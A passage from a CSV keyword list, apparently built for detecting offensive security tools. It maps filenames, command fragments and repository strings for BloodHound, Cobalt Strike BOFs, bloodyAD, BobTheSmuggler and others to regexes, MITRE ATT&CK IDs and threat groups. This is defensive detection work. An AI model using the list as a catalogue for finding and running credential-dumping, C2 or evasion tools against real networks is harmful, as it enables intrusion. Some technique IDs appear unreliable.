tools","https://github.com/daem0nc0re/VectorKernel/","1","1","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*BlockOpenHandle.cpp*",".{0,1000}BlockOpenHandle\.cpp.{0,1000}","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","9","2","157","24","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" "*BlockOpenHandle.exe*",".{0,1000}BlockOpenHandle\.exe.{0,1000}","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","9","2","157","24","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" "*BlockOpenHandle.vcxproj*",".{0,1000}BlockOpenHandle\.vcxproj.{0,1000}","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYSTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","9","2","157","24","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" "*BlockOpenHandle-main*",".{0,1000}BlockOpenHandle\-main.{0,1000}","offensive_tool_keyword","BlockOpenHandle","Block any Process to open HANDLE to your process - only SYSTEM is allowed to open handle to your process - with that you can avoid remote memory scanners","T1050.005 - T1480","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/BlockOpenHandle","1","1","N/A","9","2","157","24","2023-04-27T05:42:51Z","2023-04-27T05:40:47Z" "*blog.lexfo.fr/sshimpanzee.html*",".{0,1000}blog\.lexfo\.fr\/sshimpanzee\.html.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mechanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lexfo/sshimpanzee","1","1","N/A","10","10","228","26","2024-01-29T14:20:03Z","2023-04-03T10:11:27Z" "*bloginuser*",".{0,1000}bloginuser.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 
- T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*blogonpasswords*",".{0,1000}blogonpasswords.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*bloodhound &> /dev/null &*",".{0,1000}bloodhound\s\&\>\s\/dev\/null\s\&.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*bloodhound --no-sandbox*",".{0,1000}bloodhound\s\-\-no\-sandbox.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*BloodHound-*.zip*",".{0,1000}BloodHound\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*bloodhound.ad.*",".{0,1000}bloodhound\.ad\..{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*bloodhound.bin*",".{0,1000}bloodhound\.bin.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*bloodhound.enumeration*",".{0,1000}bloodhound\.enumeration.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*BloodHound.ps1*",".{0,1000}BloodHound\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Get-SPN.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*bloodhound.py *",".{0,1000}bloodhound\.py\s.{0,1000}","offensive_tool_keyword","BloodHound.py","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Exploitation tools","https://github.com/fox-it/BloodHound.py","1","0","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*bloodhound.py*",".{0,1000}bloodhound\.py.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*bloodhound.rb*",".{0,1000}bloodhound\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bloodhound_output*/dev/null*",".{0,1000}bloodhound_output.{0,1000}\/dev\/null.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*bloodhound_output_*.txt*",".{0,1000}bloodhound_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*bloodhound_output_dconly_*",".{0,1000}bloodhound_output_dconly_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" 
"*BloodHoundAD*",".{0,1000}BloodHoundAD.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069 - T1482 - T1018 - T1087 - T1027 - T1046","TA0007 - TA0003 - TA0002 - TA0040 - TA0043","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","10","10","9395","1668","2024-02-09T22:50:23Z","2016-04-17T18:36:14Z" "*BloodHoundAD*",".{0,1000}BloodHoundAD.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "*BloodHoundGraphToGoFetchPath*",".{0,1000}BloodHoundGraphToGoFetchPath.{0,1000}","offensive_tool_keyword","GoFetch","GoFetch is a tool to automatically exercise an attack plan generated by the BloodHound application.","T1078 - T1078.003 - T1021 - T1021.006 - T1076.001","TA0005 - TA0001 - TA0003","N/A","N/A","Exploitation tools - AD Enumeration","https://github.com/GoFetchAD/GoFetch","1","0","N/A","10","7","620","139","2017-06-20T14:15:10Z","2017-04-11T10:45:23Z" "*bloodhound-import -du neo4j -dp *.json*",".{0,1000}bloodhound\-import\s\-du\sneo4j\s\-dp\s.{0,1000}\.json.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds 
of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*BloodHound-master*",".{0,1000}BloodHound\-master.{0,1000}","offensive_tool_keyword","bloodhound","A Python based ingestor for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*BloodHound-modified.ps1*",".{0,1000}BloodHound\-modified\.ps1.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*bloodhound-python*",".{0,1000}bloodhound\-python.{0,1000}","offensive_tool_keyword","bloodhound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. 
Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1069","TA0007","N/A","N/A","Frameworks","https://github.com/fox-it/BloodHound.py","1","1","N/A","10","10","1764","297","2024-05-01T14:33:58Z","2018-02-26T14:44:20Z" "*bloodhound-quickwin -u * -p *",".{0,1000}bloodhound\-quickwin\s\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*bloodhound-quickwin-main*",".{0,1000}bloodhound\-quickwin\-main.{0,1000}","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/kaluche/bloodhound-quickwin","1","1","AD Enumeration","6","2","185","19","2023-12-18T13:23:10Z","2021-02-16T16:04:16Z" "*BloodSecurity Hackers Shell*",".{0,1000}BloodSecurity\sHackers\sShell.{0,1000}","offensive_tool_keyword","OWASP rules","OWASP repo of rules - extracted strings for detection","T1100 - T1505.003 - T1059.001","TA0003","N/A","N/A","Persistence","https://github.com/coreruleset/coreruleset/","1","0","php title webshell","7","10","1967","343","2024-05-01T05:24:28Z","2020-05-13T11:28:52Z" "*bloodyAD -*",".{0,1000}bloodyAD\s\-.{0,1000}","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","0","N/A","10","10","1072","106","2024-03-28T07:42:11Z","2021-10-11T15:07:26Z" 
"*bloodyAD.py*",".{0,1000}bloodyAD\.py.{0,1000}","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","10","1072","106","2024-03-28T07:42:11Z","2021-10-11T15:07:26Z" "*bloodyAD-main*",".{0,1000}bloodyAD\-main.{0,1000}","offensive_tool_keyword","bloodyAD","BloodyAD is an Active Directory Privilege Escalation Framework","T1078.004 - T1059.003 - T1071.001","TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/CravateRouge/bloodyAD","1","1","N/A","10","10","1072","106","2024-03-28T07:42:11Z","2021-10-11T15:07:26Z" "*bluekeepscanner.exe*",".{0,1000}bluekeepscanner\.exe.{0,1000}","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf https://github.com/vletoux/pingcastle","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*bm90cmVkYW1lY2hlYXRzdG93aW4-*",".{0,1000}bm90cmVkYW1lY2hlYXRzdG93aW4\-.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*bmarchev/Forensike*",".{0,1000}bmarchev\/Forensike.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT 
hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","1","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*bob@moozle.wtf*",".{0,1000}bob\@moozle\.wtf.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","1","N/A","10","10","244","55","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z" "*BobTheSmuggler.py*",".{0,1000}BobTheSmuggler\.py.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","1","N/A","10","5","436","44","2024-05-01T17:23:14Z","2024-01-10T08:04:57Z" "*BobTheSmuggler-main*",".{0,1000}BobTheSmuggler\-main.{0,1000}","offensive_tool_keyword","BobTheSmuggler","HTML SMUGGLING TOOL 6 allows you to create HTML files with embedded 7z/zip archives. 
The tool would compress your binary (EXE/DLL) into 7z/zip file format then XOR encrypt the archive and then hides inside PNG/GIF image file format (Image Polyglots)","T1027 - T1204.002 - T1140","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/TheCyb3rAlpha/BobTheSmuggler","1","0","N/A","10","5","436","44","2024-05-01T17:23:14Z","2024-01-10T08:04:57Z" "*BOF prototype works!*",".{0,1000}BOF\sprototype\sworks!.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) that uses handwritten shellcode to return the process Environment strings without touching any DLL's.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/whereami","1","0","N/A","10","10","157","28","2023-03-13T15:56:38Z","2021-08-19T22:32:34Z" "*bof*/CredEnum/*",".{0,1000}bof.{0,1000}\/CredEnum\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 
- T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "*BOF.NET.git*",".{0,1000}BOF\.NET\.git.{0,1000}","offensive_tool_keyword","BOF.NET","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 
Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*BOF.NET-main*",".{0,1000}BOF\.NET\-main.{0,1000}","offensive_tool_keyword","BOF.NET","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","0","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*BOF/*procdump/*",".{0,1000}BOF\/.{0,1000}procdump\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - 
